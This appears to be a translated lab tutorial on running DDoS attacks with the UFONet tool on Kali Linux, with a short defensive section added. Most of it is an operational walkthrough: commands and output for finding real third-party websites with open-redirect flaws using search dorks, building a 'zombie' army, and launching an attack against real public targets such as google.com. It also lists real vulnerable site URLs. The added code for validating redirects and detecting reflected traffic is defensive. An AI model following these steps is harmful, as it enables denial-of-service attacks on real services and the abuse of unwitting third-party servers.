08.3_DDoS attack simulation using ufonet

[Lab] DDoS attack simulation using ufonet

 

System used

- Kali Linux

Program used

- ufonet

 

How UFONet works

UFONet GUI

Description

UFONet is a free software tool designed to test DDoS attacks against a target using 'Open Redirect' vectors on third-party web applications, which together act like a botnet.

 

See these links for more info:

 

- CWE-601: Open Redirect:

http://cwe.mitre.org/data/definitions/601.html

- OWASP: URL Redirector Abuse:

https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2

 

UFONet abuses OSI Layer 7 (HTTP) to create/manage 'zombies' and to conduct different attacks using: GET/POST, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc. In practice each 'zombie' is an ordinary third-party web server with an unvalidated redirect or proxy parameter: UFONet asks it to fetch, or redirect to, the target URL, so the target sees the traffic arriving from the zombie rather than from the attacker.

 

[Video] -> http://ufonet.03c8.net/ufonet/UFONet-v0.6.ogv

  

 

(Kali Linux)

 

Download the ufonet program

Go to www.sourceforge.net

-> search for the "ufonet" program

-> file names: ufonet-v0.5b.zip

 ufonet-v0.6.zip

-> The GUI web configuration screens differ slightly between version 0.5b and version 0.6.

-> Version 0.6 adds several features.

-> Use the tool only inside an isolated lab VM, and only against hosts you own or are authorised to test; it is a real DDoS tool.

Site for downloading the ufonet program directly

- https://sourceforge.net/projects/ufonet/?source=directory

 

 

Unzip the ufonet program and check the directories

ufonet-v0.6.zip has already been downloaded into the /test1 directory.

 

# cd /test1

# unzip ufonet-v0.6.zip

-> output omitted

 

# ls

ufonet/ ufonet-v0.6.zip

 

# cd ufonet

# ls

README.md ufonet/

 

# cd ufonet

# ls

aliens.txt core/ docs/ dorks.txt server/ ufonet* zombies.txt

 

Check ufonet usage

# ./ufonet

===========================================================================

 

888 888 8888888888 .d88888b. 888b 888 888

888 888 888 d88PY888b 8888b 888 888

888 888 888 888 888 88888b 888 888

888 888 8888888 888 888 888Y88b 888 .d88b. 888888

888 888 888 888 888 888 Y88b888 d8P Y8b 888

888 888 888 888 888 888 Y88888 88888888 888

Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.

'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888

 

UFONet - DDoS Botnet via Web Abuse - by psy

 

===========================================================================

 

  

 

Search for zombie PCs via the google search engine

The default search engine is duck (if none is specified, duck is used).

Many search engines are supported:

Search engines available:

-------------------------

+ duck

+ google

+ bing

+ yahoo

+ yandex

-------------------------

 

Specify one of the supported engines after the --se option.

There are many keywords (dorks) used to search for zombie PCs (see the ufonet/ufonet/dorks.txt file). Each one is a query-parameter name typical of open-redirect or server-side proxy endpoints; a site that redirects to, or fetches, whatever URL is passed in that parameter can be turned into a zombie.

----------------------------------------------

proxy.php?url=

check.cgi?url=

checklink?uri=

validator?uri=

redirect_uri=

redirect=

referer=

pageurl=

returnUrl=

goto=

redir=

openfile=

?uri=

url=

----------------------------------------------

Use a suitable keyword.

 

# ./ufonet -s 'index.php?url=' --se google


 

Searching for 'zombies' using: google

 

======================

 

+Victim found: http://reprints.ygsgroup.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

------------

+Victim found: http://daimi.au.dk/CPnets/proxy.php?url=

------------

+Victim found: http://business.louisville.edu/cob-it-blog/wp-content/plugins/google-document-embedder/proxy.php?url=

------------

+Victim found: http://www.icap2014.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

------------

+Victim found: http://judicial.ronny.tw/proxy.php?url=

------------

+Victim found: http://2ch.io/img.theqoo.net/proxy.php?url=

------------

+Victim found: http://www.eurasiam.com/proxy.php?url=

------------

+Victim found: http://www.sltrib.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

------------

 

======================

+Possible Zombies: 8

======================

 

Wanna check if they are valid zombies? (Y/n)

Y

Are 'they' alive? :-) (HEAD Check):

===================================

Trying: 8

---------------------

Zombie: judicial.ronny.tw

Status: Ok [200]

----------

Zombie: reprints.ygsgroup.com

Status: Ok [200]

----------

Zombie: www.icap2014.com

Status: Ok [200]

----------

Zombie: 2ch.io

Status: Ok [200]

----------

Zombie: www.sltrib.com

Status: Ok [200]

----------

Zombie: www.eurasiam.com

Status: Ok [200]

----------

Zombie: daimi.au.dk

Status: Ok [200]

----------

Zombie: business.louisville.edu http://business.louisville.edu/cob-it-blog/wp-content/plugins/google-document-embedder/proxy.php?url=

Status: Not Allowed [0]

----------

==================

OK: 7 Fail: 1

==================

======================

Checking for payloads:

======================

Trying: 7

---------------------

Vector: http://2ch.io/img.theqoo.net/proxy.php?url=

Status: Not ready...

----------

Vector: http://judicial.ronny.tw/proxy.php?url=

Status: Not ready...

----------

Vector: http://reprints.ygsgroup.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

Status: Not ready...

----------

Vector: http://www.icap2014.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

Status: Waiting your orders...

----------

Vector: http://www.eurasiam.com/proxy.php?url=

Status: Waiting your orders...

----------

Vector: http://daimi.au.dk/CPnets/proxy.php?url=

Status: Waiting your orders...

----------

Vector: http://www.sltrib.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

Status: Not ready...

----------

==================

OK: 3 Fail: 4

==================

==================

Army of 'zombies'

==================

------------------

Total Army: 3

------------------

Wanna update your army (Y/n)Y

-------------------------

 

[Info] - Botnet updated! ;-)
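The sites reported above as "Waiting your orders..." are zombies only because their proxy.php?url= (or redirect=, goto=, returnUrl=, ...) parameter is used without validation. The following is an added example, not code from this page or from UFONet, showing the anti-pattern next to a hardened version that only accepts same-site paths or http(s) URLs on an allowlist. The allowlisted hosts (www.example.com, cdn.example.com) and the probe URLs are assumptions made for the example.

```python
"""Closing the hole that turns a site into a UFONet 'zombie'.

Added example (not UFONet code, not from the page). The allowlist below is an
assumed example.com domain; replace it with the hosts your application really
needs to redirect to or fetch from.
"""
from urllib.parse import urlsplit

# Assumed: the only hosts this application is ever allowed to send users to / fetch from.
ALLOWED_HOSTS = {"www.example.com", "cdn.example.com"}


def vulnerable_redirect_target(url_param: str) -> str:
    """The anti-pattern behind the zombies found above: the parameter is used as-is,
    so any client can make this server hit (or bounce users to) any third party."""
    return url_param


def safe_redirect_target(url_param: str, allowed_hosts=ALLOWED_HOSTS, fallback: str = "/") -> str:
    """Return url_param only if it is a same-site path or an http(s) URL on the allowlist.

    Anything else (scheme-relative //host, userinfo tricks, javascript:, backslashes,
    header-injection characters) collapses to the fallback location.
    """
    if not url_param or any(c in url_param for c in "\\\r\n\x00"):
        # browsers treat '\' as '/', and CR/LF in a Location header is header injection
        return fallback
    parts = urlsplit(url_param.strip())

    if not parts.scheme and not parts.netloc:
        # a local path: must start with exactly one '/' ('//host' is scheme-relative)
        if parts.path.startswith("/") and not parts.path.startswith("//"):
            return url_param
        return fallback

    if parts.scheme not in ("http", "https"):          # urlsplit lower-cases the scheme
        return fallback
    if parts.username is not None or parts.password is not None:
        return fallback                                  # http://www.example.com@evil/...
    host = parts.hostname                                # lower-cased, port and userinfo removed
    if host is None or host not in allowed_hosts:
        return fallback
    return url_param


if __name__ == "__main__":
    probes = [
        "/account",                                   # fine: local path
        "//evil.example/x",                           # scheme-relative redirect
        "https://www.example.com/page?x=1",           # fine: allowlisted host
        "http://www.example.com@evil.example/",       # userinfo trick
        "http://www.example.com.evil.example/",       # suffix trick
        "javascript:alert(1)",                        # non-http scheme
        "http://www.target.example/path/big.jpg",     # what a UFONet 'zombie' is asked to fetch
    ]
    for p in probes:
        print(f"{p!r:45} -> vulnerable: {vulnerable_redirect_target(p)!r:45} safe: {safe_redirect_target(p)!r}")
```

The same check applies whether the parameter drives an HTTP redirect or a server-side fetch (the proxy.php case); for a server-side fetch the allowlist also prevents the endpoint being used against internal addresses.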

 

Download the zombies list from the community server (Turina)

# ./ufonet --download-zombies


 

Downloading list of 'zombies' from server ...

 

======================

 

Trying 'blackhole': 176.28.23.46

 

Vortex: IS READY!

------------

 

[Info] - Congratulations!. Total of 'zombies' downloaded: 1716

------------

 

Wanna merge ONLY new 'zombies' to your army (Y/n) Y

-------------------------

 

[Info] - Botnet updated! ;-)

 

Run the attack via ufonet CLI commands

# ./ufonet -a http://www.google.com


Attacking: http://www.google.com

=======================================================

 

=====================

Round: 'Is target up?'

=====================

[Info] From here: YES

---------------------

[Info] From exterior: YES

---------------------

[Info] Your target looks ONLINE!. Wanna start a DDoS attack? (y/N)

y <---- (Caution) In this lab you must not choose 'y'. Always choose 'n'.

 

 

==========================================

Starting round: 1 of 1

==========================================

[Info] Attacking from: www.gamengame.com

[Info] Attacking from: brangerbriz.net

[Info] Attacking from: whitehousesurgery.org

[Info] Attacking from: msdn.developer-works.com

[Info] Attacking from: www.dog-ryusen.com

[Info] Attacking from: www.jerrywho.de

[Info] Attacking from: www.webdeveloper.com

[Info] Attacking from: www.dietistdenennie.nl

[Info] Attacking from: www.xmarks.com

[Info] Attacking from: www.sealyham.sk

[Info] Attacking from: www.nobelprize.org

[Info] Attacking from: www.haberoku.com

[Info] Attacking from: www.foiredelibramont.com

[Info] Attacking from: my.pdx.edu

[Info] Attacking from: engagethepower.org

[Info] Attacking from: lovenest.ru

[Info] Attacking from: ckthonon.free.fr

..... (omitted) .....

[Info] Attacking from: www.metamodpro.com

[Info] Attacking from: www.otohaya.com

[Info] Attacking from: www.scafco.com

[Info] Attacking from: 7ba.ru

[Info] Attacking from: business.louisville.edu

[Info] Attacking from: evoec.com

[Info] Attacking from: www.jotform.com

[Info] Attacking from: msdn.developer-works.com

[Info] Attacking from: www2.ogs.state.ny.us

..... (omitted) .....

<CTRL + Z>

[1]+ Stopped ./ufonet -a http://www.google.com

 

-> Check the attack only briefly and then cut it off.

-> Do not keep attacking continuously.

-> Note that <CTRL + Z> only suspends the process (the job shows as Stopped); it is the kill %1 below that actually terminates it. <CTRL + C> (SIGINT) would interrupt it directly.

 

# kill %1

[1]+ Stopped ./ufonet -a http://www.google.com

 

# jobs

[1]+ Terminated ./ufonet -a http://www.google.com

 

# jobs

#
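Every "Attacking from:" line above corresponds to a third-party web server that is unknowingly relaying requests to the target. From the defender's side the same event shows up in that server's access log as a burst of requests whose redirector parameter carries an off-site URL. The following is an added example, not from this page or from UFONet, that scans combined-format access logs for the parameter names in the dorks list and reports external hosts that receive many such requests. The log lines are constructed for the example (RFC 5737 documentation addresses) and www.example.com is the assumed own hostname.

```python
"""Detecting that your own server is being used as a UFONet-style 'zombie'.

Added example (not from the page or from UFONet). Scans access-log lines in the
common 'combined' format for redirector/proxy parameters whose value is an
absolute off-site URL and reports external hosts hit repeatedly through them.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Parameter names from dorks.txt (compared case-insensitively).
REDIRECT_PARAMS = {"url", "uri", "redirect", "redirect_uri", "referer",
                   "pageurl", "returnurl", "goto", "redir", "openfile"}

# Apache/nginx "combined" log line: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def external_targets(request_target, own_hosts):
    """Yield off-site hosts named in redirector-style parameters of one request target."""
    query = urlsplit(request_target).query
    for key, value in parse_qsl(query, keep_blank_values=True):   # parse_qsl URL-decodes
        if key.lower() not in REDIRECT_PARAMS:
            continue
        parts = urlsplit(value)
        host = parts.hostname
        if parts.scheme in ("http", "https") and host and host not in own_hosts:
            yield host


def find_reflection_abuse(lines, own_hosts, threshold=3):
    """Return {external_host: (request_count, [client_ips])} for hosts at/above threshold.

    Many requests that all ask this server to fetch or redirect to the same third
    party are the signature of being used as a reflector against that party.
    """
    per_target = Counter()
    clients = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for host in external_targets(m["target"], own_hosts):
            per_target[host] += 1
            clients.setdefault(host, set()).add(m["ip"])
    return {h: (n, sorted(clients[h])) for h, n in per_target.items() if n >= threshold}


# Constructed sample lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Apr/2015:10:00:01 +0000] "GET /proxy.php?url=http://www.target.example/path/big.jpg HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Apr/2015:10:00:01 +0000] "GET /proxy.php?url=http://www.target.example/path/big.jpg HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Apr/2015:10:00:02 +0000] "GET /proxy.php?url=http%3A%2F%2Fwww.target.example%2Fpath%2Fbig.jpg HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Apr/2015:10:00:02 +0000] "GET /login?redirect=https://www.target.example/ HTTP/1.1" 302 0 "-" "curl/7.40"',
    '203.0.113.5 - - [01/Apr/2015:10:00:03 +0000] "HEAD /cms/sites/all/modules/ckeditor_link/proxy.php?url=http://www.target.example/ HTTP/1.1" 200 0 "-" "-"',
    '192.0.2.9 - - [01/Apr/2015:10:00:03 +0000] "GET /proxy.php?url=/local/img.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [01/Apr/2015:10:00:04 +0000] "GET /index.php?url=http://www.example.com/page HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Apr/2015:10:00:05 +0000] "GET /go?goto=https://other.example/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

OWN_HOSTS = {"www.example.com"}   # assumed: this server's own hostname(s)

if __name__ == "__main__":
    for host, (count, ips) in find_reflection_abuse(SAMPLE_LOG, OWN_HOSTS).items():
        print(f"{host}: {count} reflected requests from {', '.join(ips)}")
```

Relative values such as /local/img.png and URLs pointing back at the server's own host are ignored, so normal use of the endpoint does not trigger; a real deployment would feed the function from the live log and tune the threshold per time window.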

 

 

Run the attack from the ufonet GUI tool

# ./ufonet --gui

Select <START MOTHERSHIP!>

Hover the mouse pointer over the <Wormhole> area.

Hovering over <Wormhole> brings up a number of menus.

Select <Botnet> among them.

Select <List 'zombies'> and scroll down to the bottom of the screen to check the list.

Select <Attack>.

Set your target:

http://www.soldesk.com

Set place to attack:

/path/big.jpg

-> "Set place to attack" is the resource on the target that every zombie will be asked to fetch; a large static file such as big.jpg makes each reflected request cost the target more bandwidth.

(Caution) Never press START.

 

 

 

 

 

Botnet/DDoS Attack - Norse Live Footage REALTIME 1 APRIL 2015 LIVE

Go to the following website:

http://map.norsecorp.com/

[Reference URLs]

How to create botnets for DDoS attacks (2015) using Kali linux

- https://www.youtube.com/watch?v=xCqHxz4ufvo

 

Botnet / DDoS Attack - Norse Live Footage REALTIME 1 APRIL 2015 LIVE

- https://www.youtube.com/watch?v=quGv7Bf5BiY

- http://map.norsecorp.com/